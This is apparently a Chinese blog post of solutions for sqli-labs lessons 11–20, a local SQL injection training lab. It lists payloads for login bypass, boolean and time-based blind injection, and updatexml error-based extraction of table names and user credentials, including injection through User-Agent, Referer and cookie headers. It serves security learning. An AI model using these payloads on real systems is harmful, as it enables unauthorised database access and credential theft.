SQL练习 Less11-20

最新推荐文章于 2022-08-20 14:34:50 发布
最新推荐文章于 2022-08-20 14:34:50 发布
阅读量289 收藏 2
点赞数
分类专栏: CTF 文章标签: SQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/S123KO/article/details/100048614
版权

127.0.0.1/sqli/

(注意:有些后面直接附上了答案)

Less 11

1'or 1=1#

求数据库长度(布尔型盲注

1' or length(database())=8#

求数据库名(xpath)

1'and updatexml(1,concat(0x23,database()),1)#

求表数

1' or (select count(table_name) from information_schema.tables where table_schema='security')=4#

求表名

1'and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

求列名

1'and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#

求字段名

1'and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#

Less 12

xpath做法

1")or 1=1#

1")and updatexml(1,concat(0x23,database()),1)#

1")and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

1")and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#

1")and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#

Less 13

xpath做法

1')or 1=1#

1')and updatexml(1,concat(0x23,database()),1)#

1')and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

1')and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#

1')and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#

Less 14

xpath做法

1"or 1=1#

1"and updatexml(1,concat(0x23,database()),1)#

1"and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

1"and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#

1"and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#

Less 15

时间型盲注

1'or 1=1#

1' or length(database())=8#

1' or if(ascii(substr(database(),1,1))=115,sleep(5),1)#

1' or if(ascii(substr(database(),2,1))=101,sleep(5),1)#

1' or if(ascii(substr(database(),3,1))=99,sleep(5),1)#

1' or if(ascii(substr(database(),4,1))=117,sleep(5),1)#

1' or if(ascii(substr(database(),5,1))=114,sleep(5),1)#

1' or if(ascii(substr(database(),6,1))=105,sleep(5),1)#

1' or if(ascii(substr(database(),7,1))=116,sleep(5),1)#

1' or if(ascii(substr(database(),8,1))=121,sleep(5),1)#

1' or if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),1)#

Less 16

1")or 1=1#

求数据库长度(时间型盲注

1")or if(length(database()),sleep(5),1)=8#

求表数

1")or if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),1)#

Less 17

user name:admin(这里必须输入正确的用户名,否则试不出来

password:' or 1=1#

求数据库名

1'or updatexml(1,concat(0x23,database()),1)#

求表名

1'or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#   emails,less42,referers,uagents

求列名

1'or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#

求字段内容

1'or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#

Less 18

先找出 账号和密码 

之后用火狐登录后 用burp拦截 之后

爆库名

uagent后面添加:1' or updatexml(1,concat(0x7e,(database())),0) or '

uagent变为:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.01' or updatexml(1,concat(0x7e,(database())),0) or '

爆表名

   1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '

爆列名

    1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '

报段名

  1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '

Less 19

先找出 账号和密码 

之后用火狐登录后 用burp拦截 之后

爆库名

referer后面添加:1' or updatexml(1,concat(0x7e,(database())),0) or '

爆表名

   1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '

爆列名

    1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '

报段名

  1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '

Less 20

先找出 账号和密码 

之后用火狐登录后 用burp拦截 之后

求列数

za在admin之后填'order by 3%23

邮件刷新之后burp重新拦截

爆库名

1' or updatexml(1,concat(0x7e,(database())),0) or '

爆表名

1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '

爆列名

1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '

报段名

1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '

 

Less1-10链接https://blog.csdn.net/S123KO/article/details/100048575

之后还会发布其他题目

睦雨承风
关注
专栏目录
Sqli-labs靶场详细攻略Less 11-16
qq_41755084的博客
10-11 681
这一关页面发生了变化,开始使用post方法传递参数。在Username字段输入1',查看错误信息。错误信息中发现password字段,基本可以确认这两个字段在同一个sql语句中联合查询。使用order by注入测试返回的参数为几列。测试到3时报错,证明返回两列。注意,这里的注释使用的是--(两个减号一个空格),而不是之前的--+。之前也提到使用加号是因为在某些http实现时会将加号转变为空格。这里使用#进行注释也是一样的。使用union select注入查询数据库名,数据库中表名。
SQL注入——Less-1-5(学习笔记)
xdjxi的博客
02-25 2292
第一关 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。5.将id=1改为一个数据库不存在的id值,如861,使用union select 1...
SQLI-LAB  的 实战记录(Less 11 - Less 20)
这块盾牌有待改良
07-15 4353
Less - 11 Error Based- String Less - 12 Error Based- Double quotes- String Less - 13 Double Injection- String- with twist
sql注入Less11-20
weixin_62420492的博客
12-19 365
Sqli-labs之Less-11和Less-12
→_→
04-02 1777
Less-11 POST - 基于错误的- 单引号- 字符型 LOGIN ATTEMPT FAILED 登录尝试失败 从这一关的提示当中我们知道这是一个post类型的,那么post与ge...
sqli-labs的sql注入——基础挑战之less11
Eternity18的博客
11-27 765
sqli-labs学习,less11SQL注入
SQL练习(less-2)报错注入
AmyBaby00的博客
08-13 476
固定格式: Updatexml(1,concat(0×7e,b) Updatexml(a,Xpath,b) 在文档a中,查找 Xpath 格式的内容 替换 b内容 Conact(a,b,c,…) 用来连接括号内的字符串 构造语句:union select updatexml(1,concat(0x7e,select database(),0x7e),1) http:/...
SQL练习(less-6)字符型&报错注入
AmyBaby00的博客
08-28 581
127.0.0.1/sqli/Less-6/?id=1 利用报错信息, 固定格式: Updatexml(a,Xpath,b) 在文档a中,查找 Xpath 格式的内容 替换 b内容 Conact(a,b,c,…) 用来连接括号内的字符串 Id=1’ union select Updatexml(1,concat(0×7e,b) union select updatexml(1,concat(0...
sql注入练习——Less-1
nzw1134864657的博客
10-14 573
1.判断是否存在注入 输入“?id=1”,发现有变化,说明存在注入 2.判断闭合字符,注释后面的内容 输入“ ?id=1’ ” http://127.0.0.1/sqli-labs-master/Less-1/?id=1’%23 3.判断列数 使用order by(排序),来判断有几列数据,随便写,先写order by 10,回显错误,则说明列数是小于5,尝试5,回显结果仍是错误的,再尝试...
SQL练习(less-5\8)延时注入
AmyBaby00的博客
08-12 616
SQL注入 延时型 延时型语句: sleep(参数,任意正整数,一般为秒) If (a,b,c)它的意思就是如果条件A成立,则输出结果B,否则输出结果C 条件语句:Id=1’and if (length长度(database(当前数据库())>1,sleep(5),0) 练习第5题: http://127.0.0.1/sqli/Less-5/index.php?id=1 通过是否延时,判...
sqli-less11题解详细过程
weixin_44352058的博客
04-22 1269
sqli-less11题解 首先我们打开less11看一下 这个题目具有交互界面,有username和password,所以这里我们用不到bp进行拦截。那我们就开始找注入点。 1.在username和password 中都输入 admin 查看结果,可以正常登陆 1: username: admin password: admin 2.那就在username中输入 admin’测试 ...
sqli-labs (less-11)
kukudeshuo的博客
03-09 2971
sqli-labs (less-11) 补充知识 从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
sqli-labs:Less-11-Less-20
打代码的小女孩
12-23 646
Less-11~Less-20是post型注入,一般都是登陆绕过,当然也是可以获取数据库的信息。
sqli-labs:Less 11~20 通关详解
qq_45756971的博客
10-27 588
第十一关: 看到登录框,先使用弱口令进行尝试,登录成功 输入单引号尝试引起报错 猜测后台语句为: select * from where username=‘username’ and password=’$password’ 接下来使用布尔注入,这里使用or 1=1永真句可以将所有查找结果输出 判断列数 成功查找到信息 第十二关 输入单引号没有引起报错,尝试输入双引号,报错信息很多,直接看到了后台的语句 这里根据报错信息,使用双引号加括号闭合 第十三关 通过报错信息可以构造如下的闭合方式 这一关同
sqli-labs (less11-less14)
Xi4or0uji
07-29 1558
less 11 post方法单引号绕过报错注入 这关跟之前get方法的差不了多少,只是get方法换成了post方法 post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=1可以得到 uname=1' union select 1,group...
生命在于折腾——SQL注入的实操(三)less11-15
易水哲的博客
08-20 640
本篇文章是sql-lib的11-15关。
【less-11】基于SQLI的POST字符型SQL注入
未名编程
07-17 557
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符型SQL注入 实验目的 通过本实验理解区别SQL注入中GET和POST的区别,掌握POST型SQL注入漏洞的手工注入方法,熟悉Burpsuite软件的使用。 实验环境 渗透平台:Kali 目标网站:SQLI平台上的Less-11 实验原理 1.POST方式概述 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 2.GET和POST的区别: 语义上的区别,get用于.
SQL注入】Less-11基于错误的POST单引号字符型注入
Mitchell_Donovan的博客
03-30 508
Less-11基于错误的POST单引号字符型注入 首先,这个是在用户登陆进行查询引发的post型sql注入,和get差异很大;然后我们已知其中有个用户名dumb,密码dumb;进行登陆看看! 另外本实验将会用到extractvalue()该mysql报错型函数进行sql注入;在登陆界面 输入dumb用户名 输入dumb密码 然后我们得到的拦截请求 提交post数据包uname=dumb&passwd=dumb&submit=Submit 不对它进行任何数据包修改,进行发送请求 这
sqlilab 20-28a之看不懂的教程
跳房子的博客
01-22 1242
第二十关: 接着上面19关的方法,我这里用正确的账号密码登录后发现页面显示了我的Cookie,立刻联想到Cookie注入,还是一样用Burp进行抓包,通过修改Cookie对上面的猜想进行验证 先构造出  uname=admin' 之后页面出现报错,接着构造uname=admin' -- #之后恢复正常,说明是单引号注入, 下面用order by判断字段数,当输入 uname=admin' o...
SQL注入实战:SQLi-Labs完全攻略
在基础挑战部分,涵盖了Less-1到Less-16,这些练习帮助初学者理解如何利用输入参数执行恶意SQL语句,检测和利用SQL漏洞。 接着,文档深入到盲注(Blind Injection)的讲解,背景知识和Less-5至Less-22的挑战,这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值